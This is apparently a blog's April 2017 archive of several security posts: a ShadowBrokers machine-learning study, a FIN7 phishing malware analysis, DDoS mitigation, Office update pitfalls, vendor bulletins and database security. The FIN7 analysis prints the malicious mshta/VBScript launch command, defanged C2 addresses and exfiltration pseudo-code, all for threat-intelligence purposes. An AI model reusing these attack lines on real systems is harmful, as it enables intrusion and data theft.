Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I read a lot of great papers, blog posts and full magazine articles on the ShadowBrokers Leak (free public repositories: here and here) released by WikiLeaks Vault7.  Many of them described the amazing power of such a tools (by the way they are currently used by hackers to exploit systems without MS17-010 patch) other made a great reverse engineering adventures on some of the most used payloads and other again described what is going to happen in the next feature.

So you probably are wandering why am I writing on this discussed topic again? Well, I did not find anyone who decided to extract features on such tools in order to correlate them with notorious payloads and malware. According to my previous blog post  Malware Training Sets: A machine learning dataset for everyone I decided to "refill" my public gitHub repository with more analyses on that topic.

If you are not familiar with this leak you probably want to know that Equation Group's (attributed to NSA) built FuzzBunch software, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows such as: EternalBlue, EternalRomance, Eternal Synergy, etc.. which calls external payloads as well, one of the most famous - as today- is DoublePulsar mainly used in SMB and RDP exploits. The system works straight forward by performing the following steps: 

  • STEP1: Eternalblue launching platform with configuration file (xml in the image) and target ip.

Eternalblue working

  • STEP2: DoublePulsar and additional payloads. Once the Eternablue successfully exploited Windows (in my case it was a Windows 7 SP1) it installs DoublePulsar which could be used as a professional PenTester would use Meterpreter/Empire/Beacon backdoors.  

DoublePulsar usage
  • STEP3: DanderSpritz. A Command and Control Manager to manage multiple implants. It could acts as a C&C Listener or it might be used to directly connect to targets as well.

DanderSpritz


Following the same process described here (and described in the following image) I generated features file for each of the aforementioned Equation Group tools. The process involved files detonation into multiple sandboxes performing both: dynamic analysis and static analysis as well. The analyses results get translated into MIST format and later saved into json files for convenience.


In order to compare previous generated results (aka notorious Malware available here) to the last leak by figuring out if Equation Group is also imputable to have built known Malware (included into the repository), you might decide to use one of the several Machine Learning frameworks available out there. WEKA (developed by University of Waikato) is a romantic Data Mining tool which implements several algorithms and compare them together in order to find the best fit to the data set. Since I am looking for the "best" algorithm to apply production Machine Learning to such dataset I decided to go with  WEKA. It implements several algorithms "ready to go" and it performs auto performance analyses in oder to figure out what algorithm is "best in my case". However WEKA needs a specific format which happens to be called ARFF (described here). I do have a JSON representation of MIST file. I've tried several time to import my MIST JSON file into WEKA but with no luck. So I decided to write a quick and dirty conversion tool really *not performant* and really *not usable in production environment* which converts MIST (JSONized) format into ARFF format. The following script does this job assuming the MIST JSONized content loaded into a mongodb server. NOTE: the script is ugly and written just to make it works, no input controls, no variable controls, a very quick naive and trivial o(m*n^2) loop is implemented. 

From MIST to ARFF

The resulting file MK.arff is a 1.2GB of pure text ready to be analyzed through WEKA or any other Machine Learning tools using the standard ARFF file format. The script is going available here. I am not going to comment nor to describe the results sets, since I wont to reach "governative dangerous conclusions" in my public blog. If you read that blog post to here you should have all the processes, the right data and the desired tools to be able to perform analyses by your own. Following some short inconclusive results with no associated comments.

TEST 1:
Algorithm: Simple K-Mins
Number of clusters: 95 (We know it, since the data is classified)
Seed: 18 (just random choice)
Distance Function: EuclideanDistance, Normalized and Not inverted.

RESULTS (square errors: 5.00):

K-Mins Results

TEST 2 :
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes
TEST 3 :
Algorithm: CobWeb
Number of clusters: to be discovered
Seed: 42

RESULTS: (again few significative cluster were found)

Few descriptive clusters (click to enlarge)

As today many analysts did a great job in study ShadowBrokers leak, but few of them (actually none so far, at least in my knowledge ) tried to cluster result sets derived by dynamic execution of ShadowBrokers leaks. In this post I tried to follow my previous path enlarging my public dataset by offering to security researcher data, procedures and tools to make their own analyses.

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.

To read this article in full, please click here

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDOS attacks

DDOS attacks seem to be new norm on the Internet. Years before only big websites and web applications got attacked but nowadays also rather small and medium companies or institutions get attacked. This makes it necessary for administrators of smaller sites to plan for the time they get attacked. This blog post shows you what you can do yourself and for what stuff you need external help. As you’ll see later you most likely can only mitigate DDOS attacks against the application layer by yourself and need help for all other attacks. One important part of a successful defense against a DDOS attack, which I won’t explain here in detail, is a good media strategy. e.g. If you can convince the media that the attack is no big deal, they may not report sensational about it and make the attack appear bigger and more problematic than it was. A classic example is a DDOS against a website that shows only information and has no impact on the day to day operation. But there are better blogs for this non technical topic, so lets get into the technical part.

different DDOS attacks

From the point of an administrator of a small website or web application there are basically 3 types of attacks:

  • An Attack that saturates your Internet or your providers Internet connection. (bandwidth and traffic attack)
  • Attacks against your website or web application itself. (application attack)

saturation attacks

Lets take a closer look at the first type of attack. There are many different variations of this connection saturation attacks and it does not matter for the SME administrator. You can’t do anything against it by yourself. Why? You can’t do anything on your server as the good traffic can’t reach your server as your Internet connection or a connection/router of your Internet Service Provider (ISP) is already saturated with attack traffic. The mitigation needs to take place on a system which is before the part that is saturated. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Networks (CDN). A CDN basically caches the data of your website in multiple geographical distributed locations. This way each location gets only attacked by a part of the attacking systems. This is a nice way to also guard against many application layer attacks but does not work (or not easily) if the content of your site is not the same for every client / user. e.g. an information website with some downloads and videos is easily changed to use a CDN but a application like a Webmail system or an accounting system will be hard to adapt and will not gain 100% protection even than. An other problem with CDNs is that you must protect each website separately, thats ok if you’ve only one big website that is the core of your business, but will be a problem if attacker can choose from multiple sites/applications. An classic example is that a company does protect its homepage with an CDN but the attacker finds via Google the Webmail of the companies Exchange Server. Instead of attacking the CDN, he attacks the Internet connection in front of the Qebmail. The problem will now most likely be that the VPN site-2-site connections to the remote offices of the company are down and working with the central systems is not possible anymore for the employees in the remote locations.

So let assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. Following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDOS mitigation tool. These tools take all traffic and will filter most of the bad traffic out. For this to work the mitigation tool needs to know your normal traffic patterns and the DDOS needs to be small enough that the Internet connections of the provider are able to handle it. Some companies sell on on-premise mitigation tools, don’t buy it, its wasting money.
  • If the DDOS attack is against an IP address, which is not mission critical (e.g. attack is against the website, but the web application is the critical system) let the provider block all traffic to that IP address. If the provider as an agreement with its upstream provider it is even possible to filter that traffic before it reaches the provider and so this works also if the ISPs Internet connection can not handle the attack.
  • If you have your own IP space it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and e.g. only announce it to local providers. This helps to minimize the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is specially a good mitigation method, if you’re main audience is local. e.g. 90% of your customers/clients are from the same region or country as you’re – you don’t care during an attack about IP address from x (x= foreign far away country).
  • A special technique of the last topic is to connect to a local Internet exchange which maybe also helps to reduce your Internet costs but in any case raises your resilience against DDOS attacks.

This covers the basics which allows you to understand and talk with your providers eye to eye. There is also a subsection of saturation attacks which does not saturate the connection but the server or firewall (e.g. syn floods) but as most small and medium companies will have only up to a one Gbit Internet connection it is unlikely that a descend server (and its operating system) or firewall is the limiting factor, most likely its the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDOS. Lets start with an example to describe this kind of attacks. Some years ago a common attack was to use the ping back feature of WordPress installations to flood a given URL with requests. I’ve seen such an attack which requests on a special URL on an target system, which did something CPU and memory intensive, which let to a successful DDOS against the application with less than 10Mbit traffic. All requests were valid requests and as the URL was an HTTPS one (which is more likely than not today) a mitigation in the network was not possible. The solution was quite easy in this case as the HTTP User Agent was WordPress which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would be easy to bypassed if the attacker sees it and changes his requests on his botnet. Which also leads to the main problem with this kind of attacks. You need to be able to block the bad traffic and let the good traffic through. Persistent attackers commonly change the attack mode – an attack is done in method 1 until you’re able to filter it out, than the attacker changes to the next method. This can go on for days. Do make it harder for an attacker it is a good idea to implement some kind of human vs bot detection method.

I’m human

The “I’m human” button from Google is quite well known and the technique behind it is that it rates the connection (source IP address, cookies (from login sessions to Google, …) and with that information it decides if the request is from a human or not. If the system is sure the request is from a human you won’t see anything. In case its sightly unsure a simple green check-mark will be shown, if its more unsure or thinks the request is by a bot it will show a CAPTCHA.  So the question is can we implement something similar by ourself. Sure we can, lets dive into it.

peace time

Set an special DDOS cookie if an user is authenticated correctly, during peace time. I’ll describe the data in the cookie later in detail.

war time

So lets say, we detected an attack manually or automatically by checking the number of requests eg. against the login page. In that case the bot/human detection gets activated. Now the web server checks for each request the presence of the DDOS cookie and if the cookie can be decoded correctly. All requests which don’t contain a valid DDOS cookie get redirected temporary to a separate host e.g. https://iamhuman.example.org. The referrer is the original requested URL. This host runs on a different server (so if it gets overloaded it does not effect the normal users). This host shows a CAPTCHA and if the user solves it correctly the DDOS cookie will be set for example.org and a redirect to the original URL will be send.

Info: If you’ve requests from some trusted IP ranges e.g. internal IP address or IP ranges from partner organizations you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against it write the IP address of the client encrypted into the cookie. Also put the timestamp of the creation of the cookie encrypted into it. Also storing the username, if the cookie got created by the login process, is a good idea to check which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES128 GCM) and put following into it:

  • NONCE
  • typ
    • L for Login cookie
    • C for Captcha cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for the encryption/decryption of the cookie is static and does not leave the servers. The cookie should be set for the whole domain to be able to protected multiple websites/applications. Also make it HttpOnly to make stealing it harder.

implementation

On the normal web server which checks the cookie following implementations are possible:

  • The apache web server provides a module called mod_session_* which provides some functionality but not all
  • The apache module rewriteMap (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) and using „prg: External Rewriting Program“ should allow everything. Performance may be an issue.
  • Your own Apache module

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple.

  • Use any minimalistic website with PHP/Java/Python to create cookie
  • Create your own CAPTCHA or integrate a solution like Recaptcha

pro and cons

  • Pro
    • Users than accessed authenticated within the last weeks won’t see the DDOS mitigation. Most likely these are your power users / biggest clients.
    • Its possible to step up the protection gradually. e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check for the cookie.
    • The most likely case of an attack is that the cookie is not set at all which does take really few CPU resources to check.
    • Sending an 302 to the bot does create only a few bytes of traffic and if the bot requests the redirected URL it on an other server and there no load on the server we want to protect.
    • No change to the applications is necessary
    • The operations team does not to be experts in mitigating attacks against the application layer. Simple activation is enough.
    • Traffic stats local and is not send to external provider (which may be a problem for a bank or with data protections laws in Europe)
  • Cons
    • How to handle automatic requests (API)? Make exceptions for these or block them in case of an attack?
    • Problem with non browser Clients like ActiveSync clients.
    • Multiple domains need multiple cookies

All in all I see it as a good mitigation method for application layer attacks and I hope the blog post did help you and your business. Please leave feedback in the comments. Thx!

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on Apple Mac, opening the Mac up to future attack. A refection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Battery Backup PSA

One of the better things you can do to protect your money spent on electronics devices is have a good surge protector and battery backup.   If you’re like me, you only buy the kind where you can disable the audible alarms.  The problem with this is now you might not get any warning if the battery goes bad.

In some cases you’ll have the battery backup connected to a computer via USB and receive notices that way.  But in other cases where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit.   Imagine how many times your equipment may have taken a hit that you didn’t know about.

The battery backup I just purchased says the battery is good for about three years.   So put it on your calendar.   If your battery backup has a visual indicator that its broken check that.   And you may want to use the software that comes with the battery backup to connect to each and manually run a self test.  (consult your own UPS manual about the best way to do that.)

The post Battery Backup PSA appeared first on Roger's Information Security Blog.

The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, which shows that updates weren't available when they actually were.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.

BrickerBot Permanent Denial-of-Service Attack (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

